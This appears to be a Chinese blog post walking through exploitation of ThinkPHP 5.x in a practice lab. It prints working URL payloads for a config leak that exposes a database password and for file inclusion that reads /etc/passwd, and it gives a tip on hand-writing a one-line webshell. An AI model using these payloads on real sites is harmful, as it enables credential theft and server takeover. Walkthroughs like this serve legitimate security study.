当前位置: 首页 > news >正文

常见框架漏洞攻略-ThinkPHP篇

news 来源:原创 2025/5/1 19:02:46
漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场

第二步:准备工具

第三步:启动工具,进行漏洞检测

#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞

2.目标存在tp5_dbinfo_leak漏洞
  payload:
  http://47.103.81.25:8080?s=index/think\config/get&name=database.hostname
  hostname: 127.0.0.1, hostport: , database: , username: , password: root
  
3.目标存在tp5_file_include漏洞
  payload: 
  http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞

第五步:查看tp5_file_include漏洞

第六步:尝试GetShell

注意:

如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

                                                                                                                        FROM  IYU_

相关文章:

  • 人工智能AI术语
  • 排序--快排--Hoare法
  • BSides Vancouver 2018靶机通关教学
  • Wireshark网络抓包分析使用详解
  • 【从零实现Json-Rpc框架】- 入门准备篇
  • java项目之校园美食交流系统(源码+文档)
  • python --face_recognition(人脸识别,检测,标题,特征提取)
  • C++指针基础与应用详解
  • JAVA 中的 ArrayList 工作原理
  • 鸿蒙开发新利器(二):媒体查询方法封装全解析
  • RabbitMQ 详细原理解析
  • 蓝桥杯备考:学会使用方向向量
  • 计算机三级Linux应用与开发技术(最终版了)
  • 【线程安全的单例模式和STL是否是线程安全/智能指针是否是线程安全】
  • AXIOM —— 介绍
  • ai-by-hand-excel: 用 Excel 手搓各种 AI 算法和模型
  • CSS3:深度解析与实战应用
  • 2.5.3 windows编程iocp
  • 【MATLAB例程】交互式多模型(IMM),模型使用:CV,CT左转、CT右转,二维平面,三个模型的IMM,滤波使用EKF。订阅专栏后可查看代码
  • MD2Card(markdown)
  • 扬州市中医院“药膳面包”走红,内含党参、黄芪等中药材
  • 奈雪的茶叫停“能喝奶茶就不要喝水”宣传,当地市监称不要误导消费者
  • 2024“好评中国”网络评论大赛结果揭晓
  • 总书记考察的上海“模速空间”,是一个怎样的空间?
  • 被算法重塑的世界,人与技术如何和谐共处
  • 新华社评论员:汇聚起工人阶级和广大劳动群众的磅礴力量